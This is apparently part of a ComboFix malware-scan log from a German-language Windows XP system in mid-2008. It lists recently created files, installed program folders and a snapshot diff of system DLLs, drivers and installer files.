2008-05-20 13:30 . 2006-01-10 01:11 106,496 --------- C:\WINDOWS\system32\mmcfxcommon.dll
2008-05-20 13:30 . 2006-01-11 03:20 33,792 --------- C:\WINDOWS\system32\mmcperf.exe
2008-05-20 13:25 . 2005-07-30 02:01 121,856 --------- C:\WINDOWS\system32\drivers\usbvideo.sys
2008-05-20 12:07 . 2008-06-16 16:08 <DIR> d-------- C:\WINDOWS\system32\CatRoot2
2008-05-20 10:19 . 2008-06-02 16:08 <DIR> d-------- C:\Programme\Malwarebytes' Anti-Malware
2008-05-20 10:19 . 2008-05-20 10:19 <DIR> d-------- C:\Dokumente und Einstellungen\Robert\Anwendungsdaten\Malwarebytes
2008-05-20 10:19 . 2008-05-20 10:19 <DIR> d-------- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Malwarebytes
2008-05-20 10:19 . 2008-05-30 01:06 34,296 --a------ C:\WINDOWS\system32\drivers\mbamcatchme.sys
2008-05-20 10:19 . 2008-05-30 01:06 15,864 --a------ C:\WINDOWS\system32\drivers\mbam.sys
2008-05-19 19:40 . 2008-05-19 19:40 <DIR> d-------- C:\Programme\CCleaner
2008-05-19 17:35 . 2008-05-19 17:35 <DIR> d-------- C:\Programme\Trend Micro
2008-05-16 11:58 . 2008-05-16 11:58 12,632 --a------ C:\WINDOWS\system32\lsdelete.exe

.
(((((((((((((((((((((((((((((((((((( Find3M Bericht ))))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2008-06-16 13:36 --------- d-----w C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Babylon
2008-06-16 13:06 --------- d-----w C:\Programme\WS_FTP Pro
2008-06-06 11:00 --------- d-----w C:\Programme\Spybot - Search & Destroy
2008-06-06 10:54 --------- d-----w C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Microsoft Help
2008-06-06 10:51 --------- d-----w C:\Dokumente und Einstellungen\Robert\Anwendungsdaten\Uniblue
2008-06-06 10:33 --------- d--h--w C:\Programme\InstallShield Installation Information
2008-06-06 10:33 --------- d-----w C:\Programme\Motorola Phone Tools
2008-06-06 10:33 --------- d-----w C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\BVRP Software
2008-06-06 10:32 --------- d---a-w C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\TEMP
2008-06-06 10:24 --------- d-----w C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Spybot - Search & Destroy
2008-06-06 09:59 --------- d-----w C:\Programme\Gemeinsame Dateien\Webroot Shared
2008-06-06 09:26 --------- d-----w C:\Programme\Gemeinsame Dateien\Wise Installation Wizard
2008-06-03 04:24 --------- d-----w C:\Programme\DivX
2008-06-02 21:44 --------- d-----w C:\Programme\SourceTec
2008-06-02 13:53 --------- d-----w C:\Dokumente und Einstellungen\Robert\Anwendungsdaten\Skype
2008-05-30 11:07 --------- d-----w C:\Programme\Zoom Search Engine 5.1
2008-05-28 16:31 --------- d-----w C:\Programme\TotalValidatorTool
2008-05-26 14:43 --------- d-----w C:\Programme\Microsoft Lernen und Wissen
2008-05-26 08:12 --------- d-----w C:\Dokumente und Einstellungen\Robert\Anwendungsdaten\BitTorrent
2008-05-25 14:28 --------- d-----w C:\Programme\Hide IP Platinum
2008-05-24 15:09 --------- d-----w C:\Dokumente und Einstellungen\Robert\Anwendungsdaten\IBP
2008-05-23 10:54 --------- d-----w C:\Programme\XoftSpySE
2008-05-23 09:50 --------- d-----w C:\Programme\MSECACHE
2008-05-20 16:17 --------- d-----w C:\Programme\Java
2008-05-20 12:00 --------- d-----w C:\Dokumente und Einstellungen\Robert\Anwendungsdaten\Babylon
2008-05-20 09:27 --------- d-----w C:\Programme\ITSolution
2008-05-19 15:53 --------- d-----w C:\Programme\Bytescout Movies Extractor Scout
2008-05-19 12:50 --------- d-----w C:\Dokumente und Einstellungen\Robert\Anwendungsdaten\AdobeUM
2008-05-19 11:37 --------- d-----w C:\Programme\Gemeinsame Dateien\Adobe
2008-05-08 12:28 202,752 ----a-w C:\WINDOWS\system32\drivers\rmcast.sys
2008-04-29 09:20 15,648 ----a-w C:\WINDOWS\system32\drivers\NSDriver.sys
2008-04-29 09:19 15,648 ----a-w C:\WINDOWS\system32\drivers\Awrtrd.sys
2008-04-29 09:19 12,960 ----a-w C:\WINDOWS\system32\drivers\Awrtpd.sys
2008-04-10 19:50 74,752 ----a-w C:\WINDOWS\ST6UNST.EXE
2008-04-10 19:50 253,952 ------w C:\WINDOWS\Setup1.exe
2008-01-13 20:38 49,958 ----a-w C:\Dokumente und Einstellungen\Robert\Anwendungsdaten\wklnhst.dat
2007-04-12 20:05 25,600 ----a-w C:\Dokumente und Einstellungen\Robert\usbsermptxp.sys
2007-04-12 20:05 22,768 ----a-w C:\Dokumente und Einstellungen\Robert\usbsermpt.sys
2007-01-08 09:44 774,144 ----a-w C:\Programme\RngInterstitial.dll
2006-04-25 19:39 46 ----a-w C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\wklnhst.dat
2007-04-09 20:09 278,528 ----a-w C:\Programme\internet explorer\plugins\PanoViewer.dll
2007-04-09 20:09 98,304 ----a-w C:\Programme\internet explorer\plugins\UPjpeg.dll
2007-07-01 20:42 23 --sha-w C:\WINDOWS\system32\daed_r.dll
.

((((((((((((((((((((((((((((( snapshot_2008-05-20_16.20.02.96 )))))))))))))))))))))))))))))))))))))))))
.
+ 2008-05-26 14:39:08 53,248 ----a-w C:\WINDOWS\assembly\GAC\Microsoft.DirectX.AudioVideoPlayback\1.0.2902.0__31bf3856ad364e35\Microsoft.DirectX.AudioVideoPlayback.dll
+ 2008-05-26 14:39:09 12,800 ----a-w C:\WINDOWS\assembly\GAC\Microsoft.DirectX.Diagnostics\1.0.2902.0__31bf3856ad364e35\Microsoft.DirectX.Diagnostics.dll
+ 2008-05-26 14:39:10 473,600 ----a-w C:\WINDOWS\assembly\GAC\Microsoft.DirectX.Direct3D\1.0.2902.0__31bf3856ad364e35\Microsoft.DirectX.Direct3D.dll
+ 2008-05-26 14:39:03 2,676,224 ----a-w C:\WINDOWS\assembly\GAC\Microsoft.DirectX.Direct3DX\1.0.2902.0__31bf3856ad364e35\Microsoft.DirectX.Direct3DX.dll
+ 2008-05-26 14:39:05 2,846,720 ----a-w C:\WINDOWS\assembly\GAC\Microsoft.DirectX.Direct3DX\1.0.2903.0__31bf3856ad364e35\Microsoft.DirectX.Direct3DX.dll
+ 2008-05-26 14:39:05 563,712 ----a-w C:\WINDOWS\assembly\GAC\Microsoft.DirectX.Direct3DX\1.0.2904.0__31bf3856ad364e35\Microsoft.DirectX.Direct3DX.dll
+ 2008-05-26 14:39:06 567,296 ----a-w C:\WINDOWS\assembly\GAC\Microsoft.DirectX.Direct3DX\1.0.2905.0__31bf3856ad364e35\Microsoft.DirectX.Direct3DX.dll
+ 2008-05-26 14:39:06 576,000 ----a-w C:\WINDOWS\assembly\GAC\Microsoft.DirectX.Direct3DX\1.0.2906.0__31bf3856ad364e35\Microsoft.DirectX.Direct3DX.dll
+ 2008-05-26 14:39:06 577,024 ----a-w C:\WINDOWS\assembly\GAC\Microsoft.DirectX.Direct3DX\1.0.2907.0__31bf3856ad364e35\Microsoft.DirectX.Direct3DX.dll
+ 2008-05-26 14:39:06 577,536 ----a-w C:\WINDOWS\assembly\GAC\Microsoft.DirectX.Direct3DX\1.0.2908.0__31bf3856ad364e35\Microsoft.DirectX.Direct3DX.dll
+ 2008-05-26 14:39:07 577,536 ----a-w C:\WINDOWS\assembly\GAC\Microsoft.DirectX.Direct3DX\1.0.2909.0__31bf3856ad364e35\Microsoft.DirectX.Direct3DX.dll
+ 2008-05-26 14:39:07 578,560 ----a-w C:\WINDOWS\assembly\GAC\Microsoft.DirectX.Direct3DX\1.0.2910.0__31bf3856ad364e35\Microsoft.DirectX.Direct3DX.dll
+ 2008-05-26 14:39:10 578,560 ----a-w C:\WINDOWS\assembly\GAC\Microsoft.DirectX.Direct3DX\1.0.2911.0__31bf3856ad364e35\Microsoft.DirectX.Direct3DX.dll
+ 2008-05-26 14:39:10 145,920 ----a-w C:\WINDOWS\assembly\GAC\Microsoft.DirectX.DirectDraw\1.0.2902.0__31bf3856ad364e35\Microsoft.DirectX.DirectDraw.dll
+ 2008-05-26 14:39:10 159,232 ----a-w C:\WINDOWS\assembly\GAC\Microsoft.DirectX.DirectInput\1.0.2902.0__31bf3856ad364e35\Microsoft.DirectX.DirectInput.dll
+ 2008-05-26 14:39:10 364,544 ----a-w C:\WINDOWS\assembly\GAC\Microsoft.DirectX.DirectPlay\1.0.2902.0__31bf3856ad364e35\Microsoft.DirectX.DirectPlay.dll
+ 2008-05-26 14:39:10 178,176 ----a-w C:\WINDOWS\assembly\GAC\Microsoft.DirectX.DirectSound\1.0.2902.0__31bf3856ad364e35\Microsoft.DirectX.DirectSound.dll
+ 2008-05-26 14:39:08 223,232 ----a-w C:\WINDOWS\assembly\GAC\Microsoft.DirectX\1.0.2902.0__31bf3856ad364e35\Microsoft.DirectX.dll
- 2008-05-20 14:10:38 2,048 --s-a-w C:\WINDOWS\bootstat.dat
+ 2008-06-16 14:10:26 2,048 --s-a-w C:\WINDOWS\bootstat.dat
+ 2008-04-14 15:51:00 273,024 ------w C:\WINDOWS\Driver Cache\i386\bthport.sys
+ 2008-03-01 12:53:51 124,928 -c----w C:\WINDOWS\ie7updates\KB950759-IE7\advpack.dll
+ 2008-03-01 12:53:51 347,136 -c----w C:\WINDOWS\ie7updates\KB950759-IE7\dxtmsft.dll
+ 2008-03-01 12:53:52 214,528 -c----w C:\WINDOWS\ie7updates\KB950759-IE7\dxtrans.dll
+ 2008-03-01 12:53:52 133,120 -c----w C:\WINDOWS\ie7updates\KB950759-IE7\extmgr.dll
+ 2008-03-01 12:53:52 63,488 -c----w C:\WINDOWS\ie7updates\KB950759-IE7\icardie.dll
+ 2008-02-29 08:54:43 70,656 -c----w C:\WINDOWS\ie7updates\KB950759-IE7\ie4uinit.exe
+ 2008-03-01 12:53:52 153,088 -c----w C:\WINDOWS\ie7updates\KB950759-IE7\ieakeng.dll
+ 2008-03-01 12:53:52 230,400 -c----w C:\WINDOWS\ie7updates\KB950759-IE7\ieaksie.dll
+ 2008-02-15 05:44:25 161,792 -c----w C:\WINDOWS\ie7updates\KB950759-IE7\ieakui.dll
+ 2008-03-01 12:53:52 383,488 -c----w C:\WINDOWS\ie7updates\KB950759-IE7\ieapfltr.dll
+ 2008-03-01 12:53:53 384,512 -c----w C:\WINDOWS\ie7updates\KB950759-IE7\iedkcs32.dll
+ 2008-03-01 12:53:56 6,066,176 -c----w C:\WINDOWS\ie7updates\KB950759-IE7\ieframe.dll
+ 2008-03-01 12:53:57 44,544 -c----w C:\WINDOWS\ie7updates\KB950759-IE7\iernonce.dll
+ 2008-03-01 12:53:57 267,776 -c----w C:\WINDOWS\ie7updates\KB950759-IE7\iertutil.dll
+ 2008-02-22 10:00:51 13,824 -c----w C:\WINDOWS\ie7updates\KB950759-IE7\ieudinit.exe
+ 2008-02-29 08:55:08 625,664 -c----w C:\WINDOWS\ie7updates\KB950759-IE7\iexplore.exe
+ 2008-03-01 12:53:58 27,648 -c----w C:\WINDOWS\ie7updates\KB950759-IE7\jsproxy.dll
+ 2008-03-01 12:53:59 459,264 -c----w C:\WINDOWS\ie7updates\KB950759-IE7\msfeeds.dll
+ 2008-03-01 12:53:59 52,224 -c----w C:\WINDOWS\ie7updates\KB950759-IE7\msfeedsbs.dll
+ 2008-03-01 16:24:04 3,591,680 -c----w C:\WINDOWS\ie7updates\KB950759-IE7\mshtml.dll
+ 2008-03-01 12:54:02 478,208 -c----w C:\WINDOWS\ie7updates\KB950759-IE7\mshtmled.dll
+ 2008-03-01 12:54:03 193,024 -c----w C:\WINDOWS\ie7updates\KB950759-IE7\msrating.dll
+ 2008-03-01 12:54:03 671,232 -c----w C:\WINDOWS\ie7updates\KB950759-IE7\mstime.dll
+ 2008-03-01 12:54:03 102,912 -c----w C:\WINDOWS\ie7updates\KB950759-IE7\occache.dll
+ 2008-03-01 12:54:04 44,544 -c----w C:\WINDOWS\ie7updates\KB950759-IE7\pngfilt.dll
+ 2007-03-06 01:14:13 217,312 -c----w C:\WINDOWS\ie7updates\KB950759-IE7\spuninst\spuninst.exe
+ 2007-03-06 01:15:25 377,568 -c----w C:\WINDOWS\ie7updates\KB950759-IE7\spuninst\updspapi.dll
+ 2008-03-01 12:54:04 105,984 -c----w C:\WINDOWS\ie7updates\KB950759-IE7\url.dll
+ 2008-03-01 12:54:04 1,159,680 -c----w C:\WINDOWS\ie7updates\KB950759-IE7\urlmon.dll
+ 2008-03-01 12:54:05 233,472 -c----w C:\WINDOWS\ie7updates\KB950759-IE7\webcheck.dll
+ 2008-03-01 12:54:05 826,368 -c----w C:\WINDOWS\ie7updates\KB950759-IE7\wininet.dll
+ 2008-05-26 14:51:18 368,640 ----a-r C:\WINDOWS\Installer\{08101881-FCA5-44A7-B863-D66037A16AAF}\ENCICO6B.EXE
- 2008-05-20 11:06:00 1,165,584 ----a-r C:\WINDOWS\Installer\{90120000-0030-0000-0000-0000000FF1CE}\accicons.exe
+ 2008-06-06 10:53:56 1,165,584 ----a-r C:\WINDOWS\Installer\{90120000-0030-0000-0000-0000000FF1CE}\accicons.exe
- 2008-05-20 11:06:01 20,240 ----a-r C:\WINDOWS\Installer\{90120000-0030-0000-0000-0000000FF1CE}\cagicon.exe
+ 2008-06-06 10:53:56 20,240 ----a-r C:\WINDOWS\Installer\{90120000-0030-0000-0000-0000000FF1CE}\cagicon.exe
- 2008-05-20 11:06:00 159,504 ----a-r C:\WINDOWS\Installer\{90120000-0030-0000-0000-0000000FF1CE}\inficon.exe
+ 2008-06-06 10:53:56 159,504 ----a-r C:\WINDOWS\Installer\{90120000-0030-0000-0000-0000000FF1CE}\inficon.exe
- 2008-05-20 11:06:00 184,080 ----a-r C:\WINDOWS\Installer\{90120000-0030-0000-0000-0000000FF1CE}\joticon.exe
+ 2008-06-06 10:53:56 184,080 ----a-r C:\WINDOWS\Installer\{90120000-0030-0000-0000-0000000FF1CE}\joticon.exe
- 2008-05-20 11:06:01 217,864 ----a-r C:\WINDOWS\Installer\{90120000-0030-0000-0000-0000000FF1CE}\misc.exe
+ 2008-06-06 10:53:56 217,864 ----a-r C:\WINDOWS\Installer\{90120000-0030-0000-0000-0000000FF1CE}\misc.exe
- 2008-05-20 11:06:01 18,704 ----a-r C:\WINDOWS\Installer\{90120000-0030-0000-0000-0000000FF1CE}\mspicons.exe
+ 2008-06-06 10:53:56 18,704 ----a-r C:\WINDOWS\Installer\{90120000-0030-0000-0000-0000000FF1CE}\mspicons.exe
- 2008-05-20 11:06:02 35,088 ----a-r C:\WINDOWS\Installer\{90120000-0030-0000-0000-0000000FF1CE}\oisicon.exe
+ 2008-06-06 10:53:56 35,088 ----a-r C:\WINDOWS\Installer\{90120000-0030-0000-0000-0000000FF1CE}\oisicon.exe
- 2008-05-20 11:06:01 845,584 ----a-r C:\WINDOWS\Installer\{90120000-0030-0000-0000-0000000FF1CE}\outicon.exe
+ 2008-06-06 10:53:56 845,584 ----a-r C:\WINDOWS\Installer\{90120000-0030-0000-0000-0000000FF1CE}\outicon.exe
- 2008-05-20 11:06:01 922,384 ----a-r C:\WINDOWS\Installer\{90120000-0030-0000-0000-0000000FF1CE}\pptico.exe
+ 2008-06-06 10:53:56 922,384 ----a-r C:\WINDOWS\Installer\{90120000-0030-0000-0000-0000000FF1CE}\pptico.exe
- 2008-05-20 11:06:01 272,648 ----a-r C:\WINDOWS\Installer\{90120000-0030-0000-0000-0000000FF1CE}\pubs.exe
+ 2008-06-06 10:53:56 272,648 ----a-r C:\WINDOWS\Installer\{90120000-0030-0000-0000-0000000FF1CE}\pubs.exe
- 2008-05-20 11:06:01 888,080 ----a-r C:\WINDOWS\Installer\{90120000-0030-0000-0000-0000000FF1CE}\wordicon.exe
+ 2008-06-06 10:53:56 888,080 ----a-r C:\WINDOWS\Installer\{90120000-0030-0000-0000-0000000FF1CE}\wordicon.exe
- 2008-05-20 11:06:00 1,172,240 ----a-r C:\WINDOWS\Installer\{90120000-0030-0000-0000-0000000FF1CE}\xlicons.exe
+ 2008-06-06 10:53:56 1,172,240 ----a-r C:\WINDOWS\Installer\{90120000-0030-0000-0000-0000000FF1CE}\xlicons.exe
+ 2008-06-05 18:14:17 382,303 ----a-w C:\WINDOWS\Installer\SandboxieInstall.exe
+ 2005-03-18 14:23:10 53,248 ----a-w C:\WINDOWS\Microsoft.NET\DirectX for Managed Code\1.0.2902.0\Microsoft.DirectX.AudioVideoPlayback.dll
+ 2005-03-18 14:23:10 12,800 ----a-w C:\WINDOWS\Microsoft.NET\DirectX for Managed Code\1.0.2902.0\Microsoft.DirectX.Diagnostics.dll
+ 2005-03-18 14:23:14 473,600 ----a-w C:\WINDOWS\Microsoft.NET\DirectX for Managed Code\1.0.2902.0\Microsoft.DirectX.Direct3D.dll
+ 2004-09-29 10:38:58 2,676,224 ----a-w C:\WINDOWS\Microsoft.NET\DirectX for Managed Code\1.0.2902.0\Microsoft.DirectX.Direct3DX.dll
+ 2005-03-18 14:23:10 145,920 ----a-w C:\WINDOWS\Microsoft.NET\DirectX for Managed Code\1.0.2902.0\Microsoft.DirectX.DirectDraw.dll
+ 2005-03-18 14:23:10 159,232 ----a-w C:\WINDOWS\Microsoft.NET\DirectX for Managed Code\1.0.2902.0\Microsoft.DirectX.DirectInput.dll
+ 2005-03-18 14:23:14 364,544 ----a-w C:\WINDOWS\Microsoft.NET\DirectX for Managed Code\1.0.2902.0\Microsoft.DirectX.DirectPlay.dll
+ 2005-03-18 14:23:12 178,176 ----a-w C:\WINDOWS\Microsoft.NET\DirectX for Managed Code\1.0.2902.0\Microsoft.DirectX.DirectSound.dll
+ 2005-03-18 14:23:14 223,232 ----a-w C:\WINDOWS\Microsoft.NET\DirectX for Managed Code\1.0.2902.0\Microsoft.DirectX.dll
+ 2004-12-01 13:53:06 2,846,720 ----a-w C:\WINDOWS\Microsoft.NET\DirectX for Managed Code\1.0.2903.0\Microsoft.DirectX.Direct3DX.dll
+ 2005-02-05 17:32:54 563,712 ----a-w C:\WINDOWS\Microsoft.NET\DirectX for Managed Code\1.0.2904.0\Microsoft.DirectX.Direct3DX.dll
+ 2005-03-18 15:23:14 567,296 ----a-w C:\WINDOWS\Microsoft.NET\DirectX for Managed Code\1.0.2905.0\Microsoft.DirectX.Direct3DX.dll
+ 2005-05-26 13:15:56 576,000 ----a-w C:\WINDOWS\Microsoft.NET\DirectX for Managed Code\1.0.2906.0\Microsoft.DirectX.Direct3DX.dll
+ 2005-07-22 15:21:34 577,024 ----a-w C:\WINDOWS\Microsoft.NET\DirectX for Managed Code\1.0.2907.0\Microsoft.DirectX.Direct3DX.dll
+ 2005-09-28 12:11:52 577,536 ----a-w C:\WINDOWS\Microsoft.NET\DirectX for Managed Code\1.0.2908.0\Microsoft.DirectX.Direct3DX.dll
+ 2005-12-05 15:20:50 577,536 ----a-w C:\WINDOWS\Microsoft.NET\DirectX for Managed Code\1.0.2909.0\Microsoft.DirectX.Direct3DX.dll
+ 2006-02-03 05:40:48 578,560 ----a-w C:\WINDOWS\Microsoft.NET\DirectX for Managed Code\1.0.2910.0\Microsoft.DirectX.Direct3DX.dll
+ 2006-03-31 09:27:50 578,560 ----a-w C:\WINDOWS\Microsoft.NET\DirectX for Managed Code\1.0.2911.0\Microsoft.DirectX.Direct3DX.dll
+ 2008-03-19 17:23:20 114,688 ----a-w C:\WINDOWS\system32\Adobe\Director\np32dsw.dll
+ 2008-03-19 17:36:22 202,168 ----a-w C:\WINDOWS\system32\Adobe\Director\SwDir.dll
+ 2008-03-19 17:24:02 487,424 ----a-w C:\WINDOWS\system32\Adobe\Shockwave 11\Control.dll
+ 2008-03-19 16:46:26 1,798,144 ----a-w C:\WINDOWS\system32\Adobe\Shockwave 11\dirapi.dll
+ 2008-03-19 17:24:04 9,216 ----a-w C:\WINDOWS\system32\Adobe\Shockwave 11\DynaPlayer.dll
+ 2008-03-19 16:36:14 754,688 ----a-w C:\WINDOWS\system32\Adobe\Shockwave 11\gi.dll
+ 2008-03-19 16:36:16 1,145,896 ----a-w C:\WINDOWS\system32\Adobe\Shockwave 11\gt.exe
+ 2008-03-19 16:36:14 52,288 ----a-w C:\WINDOWS\system32\Adobe\Shockwave 11\gtapi.dll
+ 2008-03-19 16:42:42 892,928 ----a-w C:\WINDOWS\system32\Adobe\Shockwave 11\iml32.dll
+ 2008-03-19 17:22:34 249,856 ----a-w C:\WINDOWS\system32\Adobe\Shockwave 11\Plugin.dll
+ 2008-03-19 17:25:36 442,368 ----a-w C:\WINDOWS\system32\Adobe\Shockwave 11\Proj.dll
+ 2008-03-19 17:36:06 439,736 ----a-w C:\WINDOWS\system32\Adobe\Shockwave 11\SwHelper_1100429.exe
+ 2008-03-19 17:26:20 110,592 ----a-w C:\WINDOWS\system32\Adobe\Shockwave 11\SwInit.exe
+ 2008-03-19 17:22:22 94,208 ----a-w C:\WINDOWS\system32\Adobe\Shockwave 11\SwMenu.dll
+ 2008-03-19 16:36:14 50,808 ----a-w C:\WINDOWS\system32\Adobe\Shockwave 11\SYMCCHECKER.DLL
+ 1999-06-25 08:55:30 149,504 ----a-w C:\WINDOWS\system32\Adobe\Shockwave 11\UNWISE.EXE
- 2008-03-01 12:53:51 124,928 ----a-w C:\WINDOWS\system32\advpack.dll
+ 2008-04-23 04:16:29 124,928 ----a-w C:\WINDOWS\system32\advpack.dll
+ 2005-02-05 17:45:26 2,222,800 ----a-w C:\WINDOWS\system32\d3dx9_24.dll
+ 2005-03-18 15:19:58 2,337,488 ----a-w C:\WINDOWS\system32\d3dx9_25.dll
+ 2005-07-22 17:59:04 2,319,568 ----a-w C:\WINDOWS\system32\d3dx9_27.dll
+ 2006-02-03 06:43:16 2,332,368 ----a-w C:\WINDOWS\system32\d3dx9_29.dll
- 2008-03-01 12:53:51 124,928 -c--a-w C:\WINDOWS\system32\dllcache\advpack.dll
+ 2008-04-23 04:16:29 124,928 -c--a-w C:\WINDOWS\system32\dllcache\advpack.dll
- 2008-03-01 12:53:51 347,136 -c--a-w C:\WINDOWS\system32\dllcache\dxtmsft.dll
+ 2008-04-23 04:16:29 347,136 -c--a-w C:\WINDOWS\system32\dllcache\dxtmsft.dll
- 2008-03-01 12:53:52 214,528 -c--a-w C:\WINDOWS\system32\dllcache\dxtrans.dll
+ 2008-04-23 04:16:29 214,528 -c--a-w C:\WINDOWS\system32\dllcache\dxtrans.dll
- 2008-03-01 12:53:52 133,120 -c--a-w C:\WINDOWS\system32\dllcache\extmgr.dll
+ 2008-04-23 04:16:29 133,120 -c--a-w C:\WINDOWS\system32\dllcache\extmgr.dll
- 2008-03-01 12:53:52 63,488 -c----w C:\WINDOWS\system32\dllcache\icardie.dll
+ 2008-04-23 04:16:29 63,488 -c----w C:\WINDOWS\system32\dllcache\icardie.dll
- 2008-02-29 08:54:43 70,656 -c--a-w C:\WINDOWS\system32\dllcache\ie4uinit.exe
+ 2008-04-22 07:39:48 70,656 -c--a-w C:\WINDOWS\system32\dllcache\ie4uinit.exe
- 2008-03-01 12:53:52 153,088 -c--a-w C:\WINDOWS\system32\dllcache\ieakeng.dll
+ 2008-04-23 04:16:29 153,088 -c--a-w C:\WINDOWS\system32\dllcache\ieakeng.dll
- 2008-03-01 12:53:52 230,400 -c--a-w C:\WINDOWS\system32\dllcache\ieaksie.dll
+ 2008-04-23 04:16:29 230,400 -c--a-w C:\WINDOWS\system32\dllcache\ieaksie.dll
- 2008-02-15 05:44:25 161,792 -c--a-w C:\WINDOWS\system32\dllcache\ieakui.dll
+ 2008-04-20 05:07:51 161,792 -c--a-w C:\WINDOWS\system32\dllcache\ieakui.dll
- 2008-03-01 12:53:52 383,488 -c----w C:\WINDOWS\system32\dllcache\ieapfltr.dll
+ 2008-04-23 04:16:29 383,488 -c----w C:\WINDOWS\system32\dllcache\ieapfltr.dll
- 2008-03-01 12:53:53 384,512 -c--a-w C:\WINDOWS\system32\dllcache\iedkcs32.dll
+ 2008-04-23 04:16:29 384,512 -c--a-w C:\WINDOWS\system32\dllcache\iedkcs32.dll
- 2008-03-01 12:53:56 6,066,176 -c----w C:\WINDOWS\system32\dllcache\ieframe.dll
+ 2008-04-23 04:16:30 6,066,176 -c----w C:\WINDOWS\system32\dllcache\ieframe.dll
- 2008-03-01 12:53:57 44,544 -c--a-w C:\WINDOWS\system32\dllcache\iernonce.dll
+ 2008-04-23 04:16:30 44,544 -c--a-w C:\WINDOWS\system32\dllcache\iernonce.dll
- 2008-03-01 12:53:57 267,776 -c----w C:\WINDOWS\system32\dllcache\iertutil.dll
+ 2008-04-23 04:16:30 267,776 -c----w C:\WINDOWS\system32\dllcache\iertutil.dll
- 2008-02-22 10:00:51 13,824 -c----w C:\WINDOWS\system32\dllcache\ieudinit.exe
+ 2008-04-22 07:39:58 13,824 -c----w C:\WINDOWS\system32\dllcache\ieudinit.exe
- 2008-02-29 08:55:08 625,664 -c--a-w C:\WINDOWS\system32\dllcache\iexplore.exe
+ 2008-04-22 07:40:19 625,664 -c--a-w C:\WINDOWS\system32\dllcache\iexplore.exe
- 2008-03-01 12:53:58 27,648 -c--a-w C:\WINDOWS\system32\dllcache\jsproxy.dll
+ 2008-04-23 04:16:30 27,648 -c--a-w C:\WINDOWS\system32\dllcache\jsproxy.dll
- 2006-07-17 00:00:00 297,472 -c--a-w C:\WINDOWS\system32\dllcache\msctf.dll
+ 2008-02-26 11:49:00 297,984 -c--a-w C:\WINDOWS\system32\dllcache\msctf.dll
- 2008-03-01 12:53:59 459,264 -c----w C:\WINDOWS\system32\dllcache\msfeeds.dll
+ 2008-04-23 04:16:30 459,264 -c----w C:\WINDOWS\system32\dllcache\msfeeds.dll
- 2008-03-01 12:53:59 52,224 -c----w C:\WINDOWS\system32\dllcache\msfeedsbs.dll
+ 2008-04-23 04:16:30 52,224 -c----w C:\WINDOWS\system32\dllcache\msfeedsbs.dll
- 2008-03-01 16:24:04 3,591,680 -c--a-w C:\WINDOWS\system32\dllcache\mshtml.dll
+ 2008-04-23 20:16:32 3,591,680 -c--a-w C:\WINDOWS\system32\dllcache\mshtml.dll
- 2008-03-01 12:54:02 478,208 -c--a-w C:\WINDOWS\system32\dllcache\mshtmled.dll
+ 2008-04-23 04:16:31 478,208 -c--a-w C:\WINDOWS\system32\dllcache\mshtmled.dll
- 2008-03-01 12:54:03 193,024 -c--a-w C:\WINDOWS\system32\dllcache\msrating.dll
+ 2008-04-23 04:16:31 193,024 -c--a-w C:\WINDOWS\system32\dllcache\msrating.dll
- 2008-03-01 12:54:03 671,232 -c--a-w C:\WINDOWS\system32\dllcache\mstime.dll
+ 2008-04-23 04:16:31 671,232 -c--a-w C:\WINDOWS\system32\dllcache\mstime.dll
- 2008-03-01 12:54:03 102,912 -c--a-w C:\WINDOWS\system32\dllcache\occache.dll
+ 2008-04-23 04:16:31 102,912 -c--a-w C:\WINDOWS\system32\dllcache\occache.dll
- 2008-03-01 12:54:04 44,544 -c--a-w C:\WINDOWS\system32\dllcache\pngfilt.dll
+ 2008-04-23 04:16:31 44,544 -c--a-w C:\WINDOWS\system32\dllcache\pngfilt.dll
- 2007-10-29 22:42:30 1,293,312 -c--a-w C:\WINDOWS\system32\dllcache\quartz.dll
+ 2008-05-07 05:14:45 1,293,312 -c--a-w C:\WINDOWS\system32\dllcache\quartz.dll
- 2006-07-13 08:48:58 202,240 -c--a-w C:\WINDOWS\system32\dllcache\rmcast.sys
+ 2008-05-08 12:28:49 202,752 -c--a-w C:\WINDOWS\system32\dllcache\rmcast.sys
- 2008-03-01 12:54:04 105,984 -c--a-w C:\WINDOWS\system32\dllcache\url.dll
+ 2008-04-23 04:16:31 105,984 -c--a-w C:\WINDOWS\system32\dllcache\url.dll
- 2008-03-01 12:54:04 1,159,680 -c--a-w C:\WINDOWS\system32\dllcache\urlmon.dll
+ 2008-04-23 04:16:31 1,159,680 -c--a-w C:\WINDOWS\system32\dllcache\urlmon.dll
- 2008-03-01 12:54:05 233,472 -c--a-w C:\WINDOWS\system32\dllcache\webcheck.dll
+ 2008-04-23 04:16:32 233,472 -c--a-w C:\WINDOWS\system32\dllcache\webcheck.dll
- 2008-03-01 12:54:05 826,368 -c--a-w C:\WINDOWS\system32\dllcache\wininet.dll
+ 2008-04-23 04:16:32 826,368 -c--a-w C:\WINDOWS\system32\dllcache\wininet.dll
- 2008-03-01 12:53:51 347,136 ----a-w C:\WINDOWS\system32\dxtmsft.dll
+ 2008-04-23 04:16:29 347,136 ----a-w C:\WINDOWS\system32\dxtmsft.dll
- 2008-03-01 12:53:52 214,528 ----a-w C:\WINDOWS\system32\dxtrans.dll
+ 2008-04-23 04:16:29 214,528 ----a-w C:\WINDOWS\system32\dxtrans.dll
- 2008-03-01 12:53:52 133,120 ----a-w C:\WINDOWS\system32\extmgr.dll
+ 2008-04-23 04:16:29 133,120 ----a-w C:\WINDOWS\system32\extmgr.dll
+ 2006-08-25 12:19:42 344,064 ----a-w C:\WINDOWS\system32\ffdshow\ff_kernelDeint.dll
+ 2006-08-25 12:20:58 40,960 ----a-w C:\WINDOWS\system32\ffdshow\ff_liba52.dll
+ 2006-08-25 12:21:08 155,648 ----a-w C:\WINDOWS\system32\ffdshow\ff_libdts.dll
+ 2006-08-25 12:19:32 253,952 ----a-w C:\WINDOWS\system32\ffdshow\ff_libfaad2.dll
+ 2006-08-25 12:20:06 118,784 ----a-w C:\WINDOWS\system32\ffdshow\ff_libmad.dll
+ 2006-08-25 12:21:02 122,880 ----a-w C:\WINDOWS\system32\ffdshow\ff_samplerate.dll
